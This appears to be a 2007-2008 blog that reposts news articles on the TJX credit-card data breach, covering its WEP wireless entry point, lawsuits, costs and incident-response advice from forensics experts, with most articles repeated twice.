Monday, February 04, 2008
What Not to Do After a Security Breach
What Not to Do After a Security Breach
Expert familiar with TD Ameritrade, TJX cases discusses the mistakes enterprises often make following a breach
OCTOBER 26, 2007 | 4:00 PM
By Kelly Jackson Higgins
Senior Editor, Dark Reading
Step number one after a security breach: Don't immediately bring in the outside forensics team --- get your attorney up to speed on the attack first. And don't assume just because you had a break-in that you have to disclose it publicly -- it all depends on whether data covered under regulatory mandates was exposed.
These are two bits of advice to the security-breached from Kevin Mandia, a forensics expert who has worked on the front line of the TD Ameritrade investigation and is serving as an expert in the TJX breach case. Mandia will testify as an expert witness for the credit- and debit-card issuers if the TJX case goes to trial.
Mandia takes a different view than some breach experts, who encourage enterprises to make swift disclosure of suspected breaches. (See What to Do When Your Security's Breached.)
"Only 'the need to know' should be 'in the know,'" says Mandia, CEO of Mandiant, who for the past 15 years has worked on over 100 computer security breaches with the Fortune 500, FBI, and military. He's seen a lot of mistakes made by victims over the years, he says, as well as major shifts in how companies must respond in today's regulatory and disclosure environment.
Mandia, who couldn't comment directly on the Ameritrade or TJX cases, says over half of the cases that his firm responds to don't actually require public disclosure at all. "This happens a lot -- a database gets compromised and the systems admin pushes back his chair and says 'our database has been compromised,' and the rumor mill starts," he says. "Even if there's no 'covered' [regulated] data on the database, people start talking about it, the Wall Street Journal [reports it]."
"I still believe that in over 50 percent of the [incidents] we respond to, disclosure is not required," Mandia says. "Even if there's 'covered' data in the system, it could be encrypted, for instance, and it's unreasonable to think it was compromised."
Attorney-client privilege goes a long way. "The need for counsel is one of the biggest changes I've seen in incident response in the past two years," he says. "But it's very important to have counsel involved before we are -- for attorney-client privilege."
Another big misstep is misjudging whether sensitive data covered by regulatory requirements has been breached. "If I have a computer that's been compromised, I don't have to disclose that my computer has been breached," says Mandia, who will be presenting some of his findings in forensic investigations at the SecTor security conference in Toronto next month. Only if the data that falls under HIPAA, SOX, PCI, FTC safeguards, and state privacy laws, for instance, has been breached, he says.
Typically, the IT or security technicians in the trenches have to respond and provide their opinions to upper management and counsel on whether data was exposed. "The biggest challenge is technicians are not very good with gray areas, and they're not suited for making opinions" on this, he says. "It's actually better for a layperson to do it."
Another common error companies make is assuming that the attack was an inside job, and focusing only on that attack vector. "Nine of out 10 think it's an insider... that there's no way their crown jewels could be compromised [by an outsider]," Mandia says. "The catch is that insider investigations are 10 times more costly than external ones because [they must work] surreptitiously -- it's us versus us."
So it can take months to investigate, and it may be all for naught if the breach actually came from outside, he says. Not to mention lost time in catching the real perpetrators on the outside. "Firms need to move as fast as they can for the first five days... If they do that, they are more successful," he says. "But most are making their decisions too damn slowly."
Part of the problem is in most cases, there isn't just one "owner" of the incident response in an organization. The internal investigation often has people going off in different directions and not coordinating their findings, which leads to mistakes and inefficiencies. "You need one guy who handles it appropriately and has enough clout to be a leader," Mandia says. "It needs to be someone no less than two rungs from the top."
Meanwhile, the process of forensic data collection has changed: Due to the nature of today's malware, companies now must also acquire and analyze system memory as well during their investigations, he says. "You have to inspect within the memory," he says.
And most organizations today are running in fear of kernel-level rootkits, he says. "Everyone is chasing that ghost, although they are not finding a lot of them," he says. "Everyone wants to do rootkit detection when responding" to a breach, he says.
The attack techniques, however, are basically same old, same old, he says. "The vulnerabilities are generally going to be in Office and PowerPoint and they are still coming in via email," he says, and users are still being duped into clicking infected attachments with trojans and keyloggers, for instance.
Expert familiar with TD Ameritrade, TJX cases discusses the mistakes enterprises often make following a breach
OCTOBER 26, 2007 | 4:00 PM
By Kelly Jackson Higgins
Senior Editor, Dark Reading
Step number one after a security breach: Don't immediately bring in the outside forensics team --- get your attorney up to speed on the attack first. And don't assume just because you had a break-in that you have to disclose it publicly -- it all depends on whether data covered under regulatory mandates was exposed.
These are two bits of advice to the security-breached from Kevin Mandia, a forensics expert who has worked on the front line of the TD Ameritrade investigation and is serving as an expert in the TJX breach case. Mandia will testify as an expert witness for the credit- and debit-card issuers if the TJX case goes to trial.
Mandia takes a different view than some breach experts, who encourage enterprises to make swift disclosure of suspected breaches. (See What to Do When Your Security's Breached.)
"Only 'the need to know' should be 'in the know,'" says Mandia, CEO of Mandiant, who for the past 15 years has worked on over 100 computer security breaches with the Fortune 500, FBI, and military. He's seen a lot of mistakes made by victims over the years, he says, as well as major shifts in how companies must respond in today's regulatory and disclosure environment.
Mandia, who couldn't comment directly on the Ameritrade or TJX cases, says over half of the cases that his firm responds to don't actually require public disclosure at all. "This happens a lot -- a database gets compromised and the systems admin pushes back his chair and says 'our database has been compromised,' and the rumor mill starts," he says. "Even if there's no 'covered' [regulated] data on the database, people start talking about it, the Wall Street Journal [reports it]."
"I still believe that in over 50 percent of the [incidents] we respond to, disclosure is not required," Mandia says. "Even if there's 'covered' data in the system, it could be encrypted, for instance, and it's unreasonable to think it was compromised."
Attorney-client privilege goes a long way. "The need for counsel is one of the biggest changes I've seen in incident response in the past two years," he says. "But it's very important to have counsel involved before we are -- for attorney-client privilege."
Another big misstep is misjudging whether sensitive data covered by regulatory requirements has been breached. "If I have a computer that's been compromised, I don't have to disclose that my computer has been breached," says Mandia, who will be presenting some of his findings in forensic investigations at the SecTor security conference in Toronto next month. Only if the data that falls under HIPAA, SOX, PCI, FTC safeguards, and state privacy laws, for instance, has been breached, he says.
Typically, the IT or security technicians in the trenches have to respond and provide their opinions to upper management and counsel on whether data was exposed. "The biggest challenge is technicians are not very good with gray areas, and they're not suited for making opinions" on this, he says. "It's actually better for a layperson to do it."
Another common error companies make is assuming that the attack was an inside job, and focusing only on that attack vector. "Nine of out 10 think it's an insider... that there's no way their crown jewels could be compromised [by an outsider]," Mandia says. "The catch is that insider investigations are 10 times more costly than external ones because [they must work] surreptitiously -- it's us versus us."
So it can take months to investigate, and it may be all for naught if the breach actually came from outside, he says. Not to mention lost time in catching the real perpetrators on the outside. "Firms need to move as fast as they can for the first five days... If they do that, they are more successful," he says. "But most are making their decisions too damn slowly."
Part of the problem is in most cases, there isn't just one "owner" of the incident response in an organization. The internal investigation often has people going off in different directions and not coordinating their findings, which leads to mistakes and inefficiencies. "You need one guy who handles it appropriately and has enough clout to be a leader," Mandia says. "It needs to be someone no less than two rungs from the top."
Meanwhile, the process of forensic data collection has changed: Due to the nature of today's malware, companies now must also acquire and analyze system memory as well during their investigations, he says. "You have to inspect within the memory," he says.
And most organizations today are running in fear of kernel-level rootkits, he says. "Everyone is chasing that ghost, although they are not finding a lot of them," he says. "Everyone wants to do rootkit detection when responding" to a breach, he says.
The attack techniques, however, are basically same old, same old, he says. "The vulnerabilities are generally going to be in Office and PowerPoint and they are still coming in via email," he says, and users are still being duped into clicking infected attachments with trojans and keyloggers, for instance.
Labels: TD Ameritrade Holding Corp., TJX Companies Inc.
How TJX Became a Lesson In Proper Security
How TJX Became a Lesson In Proper Security
By Andy Patrizio
The TJX security breach is threatening to rank as one of the most expensive lessons in corporate data security policies.
With the retailer facing anywhere from $500 million to nearly $1 billion in expenses, not to mention a black eye with the public over how their credit card data is secured, this experience should serve as a lesson to other retail outlets on securing their networks. How well they are learning is the question.
The latest chapter in this still-unfinished book is a settlement between TJX Companies and Visa U.S.A. Under the agreement, TJX will pay a maximum of $40.9 million to fund an alternative recovery payments program for customers affected by the breach. TJX has already taken the charge for the settlement, and by settling with Visa holders, staves of potential lawsuits.
Additionally, Visa will suspend and rescind a portion of the data breach fines it levied on TJX's U.S. acquirer that remain eligible for appeal. Visa and TJX agreed to the suspended and rescinded fines in part because it would increase the funds available in the alternative recovery program.
Not that the company is in the clear. According to a report from Merchant Link, which provides secure systems for retail outlets, the breach has cost the company more than $130 million to secure its infrastructure, there have been 19 lawsuits filed and there are investigations underway by the Federal Trade Commission and 37 state Attorneys General.
All this seems to have driven the message home to retailers, including TJX itself. "TJX accelerated their security program and implemented the improvements needed to become PCI (Payment Card Industry)-compliant, including upgrading their wireless security and eliminating the storage of sensitive authentication data. In fact there is some discussion about TJX becoming a 'spokescompany' for PCI security," said Avivah Litan, senior security analyst for Gartner.
Perhaps, but TJX was not keen on discussing its new security plans in detail, as it did not respond to repeated requests for an interview. TJX is the parent company of T.J. Maxx, Marshalls, HomeGoods and A.J. Wright stores in the U.S., as well as Winners and HomeSense in Canada. Revenue for its most recent fiscal year ended January 2007 was $17.4 billion. For so large a company, though, the breach started small, with crackers hacking into wireless networks at two U.S. stores.
The stores were using the relatively weak Wired Equivalent Privacy (WEP) protocol instead of the stronger Wi-Fi Protected Access (WAP) protocol, but what really hurt is that the intruders were able to access the TJX internal systems and move around freely for almost two years. The breaches occurred from mid-2005 and ran through December 2006. It is estimated 47.5 million records were stolen.
That was TJX's bigger problem, letting the intruders roam freely for 18 months. Dr. Anton Chuvakin, a security expert with LogLogic, said TJX didn't have decent traffic logs. "What took TJX months was looking at all their systems and determining who took what data, from where, where it was sent, etc. The investigation took them months. They likely didn't have any logs, because they had to do system forensics rather than log analysis to arrive at their conclusions about who stole the data and how. If they had collected and analyzed log data centrally, the investigation would have been a piece of cake," he said in an e-mailed comment to InternetNews.com.
Brian Cleary, vice president of marketing for the enterprise access governance firm Aveksa, concurred. "They didn't have good access controls, they were not auditing access on a regular basis and not checking log files and access. It was really poor security governance," he said.
TJX's second mistake was storing vital credit card information, such as the data hidden in the card's magnetic strip, on local machines. This is particularly frustrating to banks, according to Litan, because it allows counterfeiters to make perfect duplicate cards.
Merchant Link's report specifically recommends to all clients that they eliminate the storage of sensitive personal data wherever possible by using secure third party services to keep the point of sale clean, and "certainly" do not store the data collected from a credit card's magnetic stripe.
Litan said TJX was certainly at fault for storing the magnetic stripe information but she also think banks have a bigger role to play in the design of the payment systems. "They rolled [payment systems] out before there were cybertheives and no one thought about security," she said. "The payment system architecture is legacy, outdated. They could update the arch and make them more secure or just require a PIN on every transaction. Instead, they'd rather keep it as business as usual and keep collecting revenue streams."
She explained that banks make more money on standard credit card transactions instead of PIN-based transactions, such as with a debit card. PINs are always encrypted and never stored when used, and would eliminate a majority of the potential problems because without a PIN, a card is useless.
John Livingston, chairman and CEO of asset management firm Absolute, concurred that companies need to smarten up about business in the Internet era. "As we adopt new technologies, there's a whole set of new procedures, policies and practices that need to take place," he told InternetNews.com. "The companies that are doing these transactions need to be educated. But there are solutions to all these things. It's not impossible to transmit secure data, it just takes dollars and a commitment from the company to make it happen."
Absolute recommends a layered approach of technologies and policies. "You want to identify and control all the sensitive data. You need to make sure it's stored in a secure facility, you need to put the policy and procedure in place to make sure it's safe," said Livingstone.
Litan said some companies have not learned the lesson of TJX's experience and have been reluctant to make significant investments in such security measures because they see no return on investment. "It's a calculated risk, I guess. They just don't want to spend time on boring security projects. There's no ROI in security, it's basically cost avoidance," she said.
But Cleary said some firms got the message. "The ones that value their brand and are a bit more forward thinking are willing to do what it takes," he said. "When you look at cost containment, you wouldn't make decisions on your home insurance that way. Why you would risk the business to that degree makes no sense and is not in the shareholder's best interests."
He added "I think there were a lot of pages of publications [covering the story] that were ripped out and handed to CIOs and Chief Security Officers and asked 'This won't happen to us, right?' This has elevated the concerns about having good security governance in place all the way to the board level."
By Andy Patrizio
The TJX security breach is threatening to rank as one of the most expensive lessons in corporate data security policies.
With the retailer facing anywhere from $500 million to nearly $1 billion in expenses, not to mention a black eye with the public over how their credit card data is secured, this experience should serve as a lesson to other retail outlets on securing their networks. How well they are learning is the question.
The latest chapter in this still-unfinished book is a settlement between TJX Companies and Visa U.S.A. Under the agreement, TJX will pay a maximum of $40.9 million to fund an alternative recovery payments program for customers affected by the breach. TJX has already taken the charge for the settlement, and by settling with Visa holders, staves of potential lawsuits.
Additionally, Visa will suspend and rescind a portion of the data breach fines it levied on TJX's U.S. acquirer that remain eligible for appeal. Visa and TJX agreed to the suspended and rescinded fines in part because it would increase the funds available in the alternative recovery program.
Not that the company is in the clear. According to a report from Merchant Link, which provides secure systems for retail outlets, the breach has cost the company more than $130 million to secure its infrastructure, there have been 19 lawsuits filed and there are investigations underway by the Federal Trade Commission and 37 state Attorneys General.
All this seems to have driven the message home to retailers, including TJX itself. "TJX accelerated their security program and implemented the improvements needed to become PCI (Payment Card Industry)-compliant, including upgrading their wireless security and eliminating the storage of sensitive authentication data. In fact there is some discussion about TJX becoming a 'spokescompany' for PCI security," said Avivah Litan, senior security analyst for Gartner.
Perhaps, but TJX was not keen on discussing its new security plans in detail, as it did not respond to repeated requests for an interview. TJX is the parent company of T.J. Maxx, Marshalls, HomeGoods and A.J. Wright stores in the U.S., as well as Winners and HomeSense in Canada. Revenue for its most recent fiscal year ended January 2007 was $17.4 billion. For so large a company, though, the breach started small, with crackers hacking into wireless networks at two U.S. stores.
The stores were using the relatively weak Wired Equivalent Privacy (WEP) protocol instead of the stronger Wi-Fi Protected Access (WAP) protocol, but what really hurt is that the intruders were able to access the TJX internal systems and move around freely for almost two years. The breaches occurred from mid-2005 and ran through December 2006. It is estimated 47.5 million records were stolen.
That was TJX's bigger problem, letting the intruders roam freely for 18 months. Dr. Anton Chuvakin, a security expert with LogLogic, said TJX didn't have decent traffic logs. "What took TJX months was looking at all their systems and determining who took what data, from where, where it was sent, etc. The investigation took them months. They likely didn't have any logs, because they had to do system forensics rather than log analysis to arrive at their conclusions about who stole the data and how. If they had collected and analyzed log data centrally, the investigation would have been a piece of cake," he said in an e-mailed comment to InternetNews.com.
Brian Cleary, vice president of marketing for the enterprise access governance firm Aveksa, concurred. "They didn't have good access controls, they were not auditing access on a regular basis and not checking log files and access. It was really poor security governance," he said.
TJX's second mistake was storing vital credit card information, such as the data hidden in the card's magnetic strip, on local machines. This is particularly frustrating to banks, according to Litan, because it allows counterfeiters to make perfect duplicate cards.
Merchant Link's report specifically recommends to all clients that they eliminate the storage of sensitive personal data wherever possible by using secure third party services to keep the point of sale clean, and "certainly" do not store the data collected from a credit card's magnetic stripe.
Litan said TJX was certainly at fault for storing the magnetic stripe information but she also think banks have a bigger role to play in the design of the payment systems. "They rolled [payment systems] out before there were cybertheives and no one thought about security," she said. "The payment system architecture is legacy, outdated. They could update the arch and make them more secure or just require a PIN on every transaction. Instead, they'd rather keep it as business as usual and keep collecting revenue streams."
She explained that banks make more money on standard credit card transactions instead of PIN-based transactions, such as with a debit card. PINs are always encrypted and never stored when used, and would eliminate a majority of the potential problems because without a PIN, a card is useless.
John Livingston, chairman and CEO of asset management firm Absolute, concurred that companies need to smarten up about business in the Internet era. "As we adopt new technologies, there's a whole set of new procedures, policies and practices that need to take place," he told InternetNews.com. "The companies that are doing these transactions need to be educated. But there are solutions to all these things. It's not impossible to transmit secure data, it just takes dollars and a commitment from the company to make it happen."
Absolute recommends a layered approach of technologies and policies. "You want to identify and control all the sensitive data. You need to make sure it's stored in a secure facility, you need to put the policy and procedure in place to make sure it's safe," said Livingstone.
Litan said some companies have not learned the lesson of TJX's experience and have been reluctant to make significant investments in such security measures because they see no return on investment. "It's a calculated risk, I guess. They just don't want to spend time on boring security projects. There's no ROI in security, it's basically cost avoidance," she said.
But Cleary said some firms got the message. "The ones that value their brand and are a bit more forward thinking are willing to do what it takes," he said. "When you look at cost containment, you wouldn't make decisions on your home insurance that way. Why you would risk the business to that degree makes no sense and is not in the shareholder's best interests."
He added "I think there were a lot of pages of publications [covering the story] that were ripped out and handed to CIOs and Chief Security Officers and asked 'This won't happen to us, right?' This has elevated the concerns about having good security governance in place all the way to the board level."
Labels: TJX Companies Inc.
Friday, June 22, 2007
Credit union bills TJX $590,000 for data breach costs
Compliance News
Credit union bills TJX $590,000 for data breach costs
Acquiring bank offloads costs of new cards and reputation damage onto noncompliant merchant
6.7.07 In another development in the TJX data breach case, a Massachusetts credit union has billed the company $590,000 in expenses it occurred as a result of hackers stealing data from the TJX system.
HarborOne Credit Union in Brockton, MA, said it had to replace 9,000 cards at a cost of $90,000 as a direct result of the incident.
The credit union also calculated that the incident cost it $500,000 in brand and reputational damage.
The credit union invoiced TJX in April but has not received any acknowledgment.
Credit union bills TJX $590,000 for data breach costs
Acquiring bank offloads costs of new cards and reputation damage onto noncompliant merchant
6.7.07 In another development in the TJX data breach case, a Massachusetts credit union has billed the company $590,000 in expenses it occurred as a result of hackers stealing data from the TJX system.
HarborOne Credit Union in Brockton, MA, said it had to replace 9,000 cards at a cost of $90,000 as a direct result of the incident.
The credit union also calculated that the incident cost it $500,000 in brand and reputational damage.
The credit union invoiced TJX in April but has not received any acknowledgment.
Labels: TJX Companies Inc.
Monday, June 11, 2007
TJX faces five more breach-related state lawsuits
TJX faces five more breach-related state lawsuits
Five additional states have filed lawsuits against TJX over the massive data breach that exposed some 45.7 million credit card numbers to hackers, the retailer reported on Thursday in a federal regulatory filing.
Framingham, Mass.-based TJX, which operates more than 2,000 locations, including hundreds of Marshall’s and T.J. Maxx stores, was named in lawsuits in Illinois, Michigan, Ohio, Texas and Missouri, according to the filing with the Securities and Exchange Commission (SEC). The company previously has been named in lawsuits in Massachusetts, Alabama and California and in Puerto Rico and six Canadian provinces.
The plaintiffs mostly contend in the lawsuits that TJX exhibited "negligence" related to the intrusions in which thieves quietly pilfered sensitive customer data for two years until TJX detected the breach last December.
A company spokesperson did not return a telephone call for comment. CEO Carol Meyrowitz apologized for the breach to a number of stockholders at the company’s annual shareholders meeting earlier this week.
Some of the new lawsuits also name Cincinnati-based Fifth Third Bank, the credit card processor for TJX, as a defendant. A bank spokesperson could not immediately be reached for comment.
The banks responsible for issuing the credit and debit cards must cover the millions of dollars of costs associated with the breach, according to most state laws. But by filing the lawsuits, banks and customers are calling for TJX to be held liable, Diana Kelley, an analyst with the Burton Group, told SCMagazine.com today.
"They’re saying, ‘We’d like somebody to absorb the costs of this. We didn’t do anything improper, yet we’re incurring huge fees for the replacement of these cards and the notifications to cardholders.'"
Kelley said Minnesota has approved a law that shifts the burden to the merchants in the event of a data breach, and Massachusetts and Texas are considering similar measures.
"I’m looking at this as a watershed moment," she said. "I do think we will look back [at TJX] and say, ‘This really started to change things.’"
The SEC filing also reported that TJX is the subject of a 37-state attorneys general investigation studying whether the company violated any laws related to consumer protection. TJX is not believed to have been Payment Card Industry (PCI) compliant because Visa has since said it is not aware of any compliant companies ever being breached.
At least one financial institution is not waiting for a court to decide whether TJX is responsible to absorb fees. According to media reports, Brockton, Mass.-based HarborOne Credit Union has billed the company for $590,000 – $90,000 to replace credit cards and $500,000 for alleged brand reputation damage.
Meanwhile, TXJ on Thursday reported 2007 sales are up three percent compared to the same 17-week period last year.
Five additional states have filed lawsuits against TJX over the massive data breach that exposed some 45.7 million credit card numbers to hackers, the retailer reported on Thursday in a federal regulatory filing.
Framingham, Mass.-based TJX, which operates more than 2,000 locations, including hundreds of Marshall’s and T.J. Maxx stores, was named in lawsuits in Illinois, Michigan, Ohio, Texas and Missouri, according to the filing with the Securities and Exchange Commission (SEC). The company previously has been named in lawsuits in Massachusetts, Alabama and California and in Puerto Rico and six Canadian provinces.
The plaintiffs mostly contend in the lawsuits that TJX exhibited "negligence" related to the intrusions in which thieves quietly pilfered sensitive customer data for two years until TJX detected the breach last December.
A company spokesperson did not return a telephone call for comment. CEO Carol Meyrowitz apologized for the breach to a number of stockholders at the company’s annual shareholders meeting earlier this week.
Some of the new lawsuits also name Cincinnati-based Fifth Third Bank, the credit card processor for TJX, as a defendant. A bank spokesperson could not immediately be reached for comment.
The banks responsible for issuing the credit and debit cards must cover the millions of dollars of costs associated with the breach, according to most state laws. But by filing the lawsuits, banks and customers are calling for TJX to be held liable, Diana Kelley, an analyst with the Burton Group, told SCMagazine.com today.
"They’re saying, ‘We’d like somebody to absorb the costs of this. We didn’t do anything improper, yet we’re incurring huge fees for the replacement of these cards and the notifications to cardholders.'"
Kelley said Minnesota has approved a law that shifts the burden to the merchants in the event of a data breach, and Massachusetts and Texas are considering similar measures.
"I’m looking at this as a watershed moment," she said. "I do think we will look back [at TJX] and say, ‘This really started to change things.’"
The SEC filing also reported that TJX is the subject of a 37-state attorneys general investigation studying whether the company violated any laws related to consumer protection. TJX is not believed to have been Payment Card Industry (PCI) compliant because Visa has since said it is not aware of any compliant companies ever being breached.
At least one financial institution is not waiting for a court to decide whether TJX is responsible to absorb fees. According to media reports, Brockton, Mass.-based HarborOne Credit Union has billed the company for $590,000 – $90,000 to replace credit cards and $500,000 for alleged brand reputation damage.
Meanwhile, TXJ on Thursday reported 2007 sales are up three percent compared to the same 17-week period last year.
Labels: TJX Companies Inc.
Saturday, May 19, 2007
Banks file suit against TJX over breach costs
Banks file suit against TJX over breach costs
Dan Kaplan Apr 25 2007 17:22
Three state banking associations announced Tuesday that they have filed a joint lawsuit against TJX Companies over "dramatic costs" their 300 members have incurred since the discount retailer announced that hackers infiltrated its processing systems, exposing some 45 million credit card numbers.
The Massachusetts Bankers Association (MBA), the Maine Association of Community Banks, and the Connecticut Bankers Association are co-plaintiffs in the lawsuit against Framingham, Mass.-based TJX.
The company, which operates about 2,500 stores including Marshalls and T.J. Maxx outlets, revealed late last month that hackers stole 45.7 million pieces of data when they illegally accessed TJX databases during 2005 and 2006.
Merchant banks have been forced to cover replacement cards — up to $25 each — as well as any costs associated with fraudulent purchases, the MBA said in a statement. The organization has previously said the stolen data was used for purchases in Florida, Georgia, Louisiana, Hong Kong and Sweden.
"Cases of fraud due to the TJX breach have been reported all over the world," the statement said. "At the time that the MBA is filing this lawsuit, banks throughout New England continue to receive lists of ‘hot' cards that have been exposed in the TJX data breach, more than three months after TJX first disclosed the problem."
Daniel Forte, president and CEO of the MBA, said the three banking associations are seeking the recovery of "tens of millions of dollars" in damages.
The lawsuit could have merit if TJX acted with negligence, Forrester vice president and research director Jonathan Penn told SCMagazine.com today.
"That's the burden they're going to face in this suit," he said.
Andy Serwin, a San Diego lawyer specializing in data privacy and security, told SCMagazine.com that in his experience, many lawsuits similar to this one get tossed out in court. He said it is difficult for plaintiffs to make a case because many of the laws governing electronic privacy allegations have yet to be fully understood.
"The states are all over the place," he said. "You're applying old law to situations that were never anticipated. Where the line is going to get drawn ultimately, it's not that clear yet."
He said some states will let retailers off the hook if a criminal act caused the data exposure.
"Ultimately, we're going to see new insurance products out there to deal with risk," Serwin said.
A legal debate such as this may soon be unnecessary in Massachusetts. State lawmakers have proposed a bill that makes retailers responsible for data losses.
A TJX spokesperson could not immediately be reached for comment.
Dan Kaplan Apr 25 2007 17:22
Three state banking associations announced Tuesday that they have filed a joint lawsuit against TJX Companies over "dramatic costs" their 300 members have incurred since the discount retailer announced that hackers infiltrated its processing systems, exposing some 45 million credit card numbers.
The Massachusetts Bankers Association (MBA), the Maine Association of Community Banks, and the Connecticut Bankers Association are co-plaintiffs in the lawsuit against Framingham, Mass.-based TJX.
The company, which operates about 2,500 stores including Marshalls and T.J. Maxx outlets, revealed late last month that hackers stole 45.7 million pieces of data when they illegally accessed TJX databases during 2005 and 2006.
Merchant banks have been forced to cover replacement cards — up to $25 each — as well as any costs associated with fraudulent purchases, the MBA said in a statement. The organization has previously said the stolen data was used for purchases in Florida, Georgia, Louisiana, Hong Kong and Sweden.
"Cases of fraud due to the TJX breach have been reported all over the world," the statement said. "At the time that the MBA is filing this lawsuit, banks throughout New England continue to receive lists of ‘hot' cards that have been exposed in the TJX data breach, more than three months after TJX first disclosed the problem."
Daniel Forte, president and CEO of the MBA, said the three banking associations are seeking the recovery of "tens of millions of dollars" in damages.
The lawsuit could have merit if TJX acted with negligence, Forrester vice president and research director Jonathan Penn told SCMagazine.com today.
"That's the burden they're going to face in this suit," he said.
Andy Serwin, a San Diego lawyer specializing in data privacy and security, told SCMagazine.com that in his experience, many lawsuits similar to this one get tossed out in court. He said it is difficult for plaintiffs to make a case because many of the laws governing electronic privacy allegations have yet to be fully understood.
"The states are all over the place," he said. "You're applying old law to situations that were never anticipated. Where the line is going to get drawn ultimately, it's not that clear yet."
He said some states will let retailers off the hook if a criminal act caused the data exposure.
"Ultimately, we're going to see new insurance products out there to deal with risk," Serwin said.
A legal debate such as this may soon be unnecessary in Massachusetts. State lawmakers have proposed a bill that makes retailers responsible for data losses.
A TJX spokesperson could not immediately be reached for comment.
Labels: TJX Companies Inc.
Report: TJX breach began in Minnesota Marshalls parking lot
Report: TJX breach began in Minnesota Marshalls parking lot
Dan Kaplan May 4 2007 17:00
The suspects who lifted the personal data of 45.7 million customers from TJX's processing systems hatched their elaborate plan some two years ago at a Marshalls outlet in Minnesota, where they used simple technology to tap into the store's wireless connection, The Wall Street Journal reported today.
According to the story, citing investigators, the intruders, from the parking lot, used a "telescope-shaped antenna" and a laptop to decode data that was moving among the Marshalls store’s scanning devices, cash registers and PCs, which were using wireless LAN connectivity.
What the intruders either learned or physically planted that day helped them later hack into TJX’s main database, where they quietly pilfered data for two years and ended up executing the largest data breach in the nation’s history.
Investigators told the newspaper that the St. Paul, Minn. Marshalls location was running a wireless network protected by the weak Wired Equivalent Privacy (WEP) industry standards, which have since been superseded by the more robust Wi-Fi Protected Access (WPA) guidelines.
TJX operates more than 2,000 discount retailers, including hundreds of Marshalls.
Gartner Vice President and Senior Fellow John Pescatore told SCMagazine.com today that the replacement standards - required under the Payment Card Industry mandates - are much more secure than WEP, which was "riddled with holes," he said.
"The encryption to keep someone from breaking in was done very poorly in this first generation," he said. "It's no better than (no security at all). This is something I would have thought an audit would've caught."
According to the newspaper, the hackers used an antenna, a common tool used to retrieve a wireless signal from a distance, Pescatore said.
He said he has heard of people creating antennae out of Pringles potato chip cans - and several websites offer instructions on how to do so. Then, he said, "all it takes is a laptop with Windows XP and it tells you what access points it can hear. It doesn't take any special equipment."
The hackers may have planted some malware on the network that day to help them later access the central database, or they may have stolen certain data that allowed them to later intrude, Pescatore said.
"The basic issue is if you connect to an access point that puts you on the network, it's just as good as if you broke into their data center and sat down on a PC," Pescatore said. "You're on their network."
The incident highlights the need for business executives to understand the value of information assets, Wain Kellum, president and CEO of Atlanta-based Trusted Network Technologies, told SCMagazine.com today.
He said that in many cases "fairly low-level network engineers" create wireless policies without any understanding of risk or financial impact to the organization if there is a breach.
"Management people are now starting to get aware that they have to participate in the dialogue," Kellum said.
A TJX spokeswoman could not be reached for comment today.
Since the breach, the Federal Trade Commission has launched an investigation, and three New England banking associations filed a lawsuit seeking to recoup costs associated with fraudulent purchases.
However, TJX has reported no negative effect on sales, which rose during the first quarter of this year.
Dan Kaplan May 4 2007 17:00
The suspects who lifted the personal data of 45.7 million customers from TJX's processing systems hatched their elaborate plan some two years ago at a Marshalls outlet in Minnesota, where they used simple technology to tap into the store's wireless connection, The Wall Street Journal reported today.
According to the story, citing investigators, the intruders, from the parking lot, used a "telescope-shaped antenna" and a laptop to decode data that was moving among the Marshalls store’s scanning devices, cash registers and PCs, which were using wireless LAN connectivity.
What the intruders either learned or physically planted that day helped them later hack into TJX’s main database, where they quietly pilfered data for two years and ended up executing the largest data breach in the nation’s history.
Investigators told the newspaper that the St. Paul, Minn. Marshalls location was running a wireless network protected by the weak Wired Equivalent Privacy (WEP) industry standards, which have since been superseded by the more robust Wi-Fi Protected Access (WPA) guidelines.
TJX operates more than 2,000 discount retailers, including hundreds of Marshalls.
Gartner Vice President and Senior Fellow John Pescatore told SCMagazine.com today that the replacement standards - required under the Payment Card Industry mandates - are much more secure than WEP, which was "riddled with holes," he said.
"The encryption to keep someone from breaking in was done very poorly in this first generation," he said. "It's no better than (no security at all). This is something I would have thought an audit would've caught."
According to the newspaper, the hackers used an antenna, a common tool used to retrieve a wireless signal from a distance, Pescatore said.
He said he has heard of people creating antennae out of Pringles potato chip cans - and several websites offer instructions on how to do so. Then, he said, "all it takes is a laptop with Windows XP and it tells you what access points it can hear. It doesn't take any special equipment."
The hackers may have planted some malware on the network that day to help them later access the central database, or they may have stolen certain data that allowed them to later intrude, Pescatore said.
"The basic issue is if you connect to an access point that puts you on the network, it's just as good as if you broke into their data center and sat down on a PC," Pescatore said. "You're on their network."
The incident highlights the need for business executives to understand the value of information assets, Wain Kellum, president and CEO of Atlanta-based Trusted Network Technologies, told SCMagazine.com today.
He said that in many cases "fairly low-level network engineers" create wireless policies without any understanding of risk or financial impact to the organization if there is a breach.
"Management people are now starting to get aware that they have to participate in the dialogue," Kellum said.
A TJX spokeswoman could not be reached for comment today.
Since the breach, the Federal Trade Commission has launched an investigation, and three New England banking associations filed a lawsuit seeking to recoup costs associated with fraudulent purchases.
However, TJX has reported no negative effect on sales, which rose during the first quarter of this year.
Labels: TJX Companies Inc.
Tuesday, May 08, 2007
Running for IP Cover
Running for IP Cover
May 7, 2007
By Lisa Vaas
In the wake of incidents such as the TJX Companies' massive data breach, reported in January, it shouldn't come as a surprise to find that 90 percent of companies plan to plug in new technology to secure electronic copies of intellectual property in the coming year.
The ESG survey—sponsored by information protection company Reconnex—is the first in a quarterly series on the topic.
One of the findings that surprised ESG was how big the IP problem is, according to Eric Ogren, a security analyst for ESG, in Milford, Mass.
Top priorities
Protecting PII(personally identifiable information) such as credit card numbers and Social Security numbers is not actually the top priority with most organizations, Ogren said.
"We asked upfront, 'What do you consider to be intellectual property?'" he said. "What they want to protect is financial information, contracts and agreements. Only after that is PII."
Other IP that companies are looking to protect include—in order of reported priority—source code, competitive intelligence, internal research data, design specifications, customers' PII, trade secrets, CRM (customer relationship management) databases and patent documents.
What's tough about protecting such data is that it comes in so many different forms. Much of it doesn't fit into a neat fixed format, as would Social Security numbers or credit card numbers, for example. Instead, it comes from all over the network).
"If you think e-mail is your only issue, you're only solving 20 percent of the problem," Ogren said.
Tremendous resources are being spent to search for networked IP, Ogren added, in terms of both manual and automated procedures. According to the report, 78 percent of those surveyed search for electronic versions of IP at least once per quarter.
"[This] is a major investment of time and resources," Ogren said. "It's in many different forms, in many different places, communicated with many different protocols."
As for the biggest perceived threat when it comes to data loss, malicious or sloppy insiders scare survey respondents the most.
